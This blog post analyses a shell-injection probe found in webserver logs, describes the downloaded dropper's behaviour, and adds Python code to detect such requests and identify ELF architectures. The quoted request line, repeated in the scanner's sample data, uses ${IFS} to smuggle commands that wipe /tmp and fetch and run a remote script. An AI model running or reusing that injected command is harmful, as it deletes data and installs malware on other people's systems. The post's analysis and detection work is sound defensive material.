That’s a win for portability I guess
I was looking through my webserver logs and saw this:
GET /bin/zhttpd/${IFS}cd${IFS}/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://redacted/l.sh;${IFS}sh${IFS}l.sh;
Okay, I guess it’s trying to exploit some extremely straightforward shell
injection in a web server (the ${IFS} is the shell’s field separator, used as a
stand-in for the spaces that would not survive in a URL). Fair enough. But I got
curious: what does this l.sh payload do?
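To see how that request line decodes and how you would catch more of them, here is a small log scanner I added for this page (it is not code from the post or from the server in question). It percent-decodes each request path, treats any shell metacharacter or ${IFS} token as the start of attacker-controlled input, and reconstructs the injected command list. The log lines it runs over are constructed for the example; the first one is the probe quoted above with its download host left redacted, and zhttpd is used only because the post shows it.

```python
import re
from urllib.parse import unquote

# Constructed sample log lines (not taken from the author's server). The first
# is the probe quoted in the post, with its download host left redacted; the
# third is the same trick percent-encoded; the others are benign requests.
SAMPLE_LOG = [
    'GET /bin/zhttpd/${IFS}cd${IFS}/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://redacted/l.sh;${IFS}sh${IFS}l.sh;',
    'GET /index.html',
    'GET /bin/zhttpd/%24%7BIFS%7Dcd%24%7BIFS%7D/tmp%3Bwget%24%7BIFS%7Dhttp://redacted/l.sh',
    'GET /search?q=ifs+and+other+shell+variables',
]

# ${IFS} (the shell's Internal Field Separator) expands to whitespace, so an
# attacker can write a multi-word command without a literal space in the URL.
IFS_TOKEN = re.compile(r'\$\{IFS\}')
# Shell metacharacters that have no business in a request path: command
# separators, pipes, backticks, $(...) substitution and the ${IFS} trick itself.
SHELL_META = re.compile(r'[;&|`]|\$\(|\$\{IFS\}')
# Minimal "METHOD PATH" request line, as the post shows it.
REQUEST_LINE = re.compile(r'^(?P<method>[A-Z]+)\s+(?P<path>\S+)')


def decode_ifs(s: str) -> str:
    """Rewrite every ${IFS} as a single space so the command reads naturally."""
    return IFS_TOKEN.sub(' ', s)


def normalize_request_path(path: str) -> str:
    """Undo percent-encoding and ${IFS} substitution in one step."""
    return decode_ifs(unquote(path))


def injected_commands(path: str) -> list[str]:
    """Return the shell commands smuggled into a request path, in execution
    order, or an empty list when the path carries no shell metacharacters.

    Percent-decoding happens first so that %24%7BIFS%7D is caught as well.
    """
    decoded = unquote(path)
    hit = SHELL_META.search(decoded)
    if hit is None:
        return []
    # Everything from the first metacharacter onward is attacker-controlled.
    shell_part = decode_ifs(decoded[hit.start():])
    return [cmd.strip() for cmd in shell_part.split(';') if cmd.strip()]


def scan_log(lines: list[str]) -> list[tuple[str, list[str]]]:
    """Flag request lines whose path carries an injection; returns
    (raw path, reconstructed commands) pairs for the flagged lines only."""
    findings = []
    for line in lines:
        m = REQUEST_LINE.match(line)
        if m is None:
            continue
        cmds = injected_commands(m.group('path'))
        if cmds:
            findings.append((m.group('path'), cmds))
    return findings


if __name__ == '__main__':
    for path, cmds in scan_log(SAMPLE_LOG):
        print(path)
        for cmd in cmds:
            print('    ', cmd)
```

Splitting on ";" is enough for this probe; a real detector would also treat "&&", "||" and "|" as separators and feed the flagged path, not the raw line, into whatever alerting you run.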
Well, I downloaded it. It:
- Force-removes /tmp/ and /var/log
- Tries to cd into various directories (including /tmp/, which it just deleted)
- Tries to run a payload from the Web, first by doing expl <URL> (I guess that only works on an already infected system), and falling back to downloading the payload URL with curl, renaming it (with cat src > dest for some reason), chmoding it, and finally executing it.
- Runs iptables -F, which flushes all iptables rules but leaves each chain’s default policy in place, so if you had a firewall configured with a DROP policy, at this point all input, and possibly output, traffic will be blocked.
- Adds a couple of iptables rules to block input traffic on some random ports
- Runs iptables-save without options, which does not save anything but prints the current iptables rules.
So all of this is pretty weird, but the weirdest part is the payload. It
actually tries to run multiple payloads, each built for a different
architecture, in the following order:
- i486
- i686
- x86
- mips
- mpsl
- arm4
- arm5
- arm6
- arm7
- ppc
- m68k
- sh4
- x86_64
… MIPS? 68000? SH-4? Really? Yes, really. I downloaded most of them, and file
confirms that they are executables for the corresponding architectures.
(I didn’t investigate further.)
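What file(1) keys on here is just the ELF identification bytes and the e_machine field, so the same check is easy to script. The following is an added example, not code from the post: it reads those fields, reports word size, endianness and architecture, and maps the result onto the dropper’s naming (mips vs. mpsl for big- and little-endian MIPS). The sample headers are constructed with a helper, not the binaries the author downloaded. Note that the arm4/arm5/arm6/arm7 and i486/i686 variants all share one e_machine value each; telling them apart needs e_flags or the .ARM.attributes section, which this example does not parse.

```python
import struct
from typing import Optional

# e_machine values from the ELF specification, limited to the architectures
# the dropper cycles through. MIPS is split into "mips" / "mpsl" by endianness
# in payload_label() below.
EM_NAMES = {
    3: 'x86',      # EM_386: the i486, i686 and x86 builds all carry this value
    4: 'm68k',     # EM_68K
    8: 'mips',     # EM_MIPS, big- or little-endian
    20: 'ppc',     # EM_PPC
    40: 'arm',     # EM_ARM: arm4..arm7 all share this value
    42: 'sh4',     # EM_SH (SuperH; the sh4 build is one variant of it)
    62: 'x86_64',  # EM_X86_64
}


def identify_elf(blob: bytes) -> Optional[dict]:
    """Parse the ELF identification bytes and e_machine, the same fields
    file(1) keys on. Returns None for anything that is not an ELF image."""
    if len(blob) < 20 or blob[:4] != b'\x7fELF':
        return None
    ei_class, ei_data = blob[4], blob[5]
    if ei_class not in (1, 2) or ei_data not in (1, 2):
        return None
    endian = '<' if ei_data == 1 else '>'
    # e_type sits at offset 16 and e_machine at 18 for both ELF32 and ELF64,
    # both stored in the byte order that EI_DATA announces.
    e_type, e_machine = struct.unpack_from(endian + 'HH', blob, 16)
    return {
        'bits': 32 if ei_class == 1 else 64,
        'endian': 'little' if ei_data == 1 else 'big',
        'e_type': e_type,
        'e_machine': e_machine,
        'arch': EM_NAMES.get(e_machine, f'unknown({e_machine})'),
    }


def payload_label(blob: bytes) -> Optional[str]:
    """Map an ELF header to the dropper's naming: 'mpsl' for little-endian
    MIPS, 'mips' for big-endian MIPS, otherwise the architecture name."""
    info = identify_elf(blob)
    if info is None:
        return None
    if info['arch'] == 'mips' and info['endian'] == 'little':
        return 'mpsl'
    return info['arch']


def fake_elf_header(ei_class: int, ei_data: int, e_machine: int) -> bytes:
    """Build a minimal, constructed 64-byte ELF header (not a real binary)
    with e_type = ET_EXEC. Only the fields identify_elf() reads are filled."""
    endian = '<' if ei_data == 1 else '>'
    ident = b'\x7fELF' + bytes([ei_class, ei_data, 1]) + b'\x00' * 9
    return (ident + struct.pack(endian + 'HH', 2, e_machine)).ljust(64, b'\x00')


# Constructed samples standing in for the dropper's per-architecture binaries.
SAMPLES = {
    'x86':    fake_elf_header(1, 1, 3),
    'mips':   fake_elf_header(1, 2, 8),
    'mpsl':   fake_elf_header(1, 1, 8),
    'arm':    fake_elf_header(1, 1, 40),
    'ppc':    fake_elf_header(1, 2, 20),
    'm68k':   fake_elf_header(1, 2, 4),
    'sh4':    fake_elf_header(1, 1, 42),
    'x86_64': fake_elf_header(2, 1, 62),
}

if __name__ == '__main__':
    for name, blob in SAMPLES.items():
        print(f'{name:7} -> {payload_label(blob)}  {identify_elf(blob)}')
```

To run it on a real download, read the first 64 bytes of the file and pass them to payload_label(); anything that returns None is not an ELF image, which is itself worth knowing about a dropped file.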
So I guess the moral of this story is: don’t rely on the fact that you’re
running Linux on weird old hardware (like, say, a 90s Pocket PC or a Dreamcast)
to save you from malware :)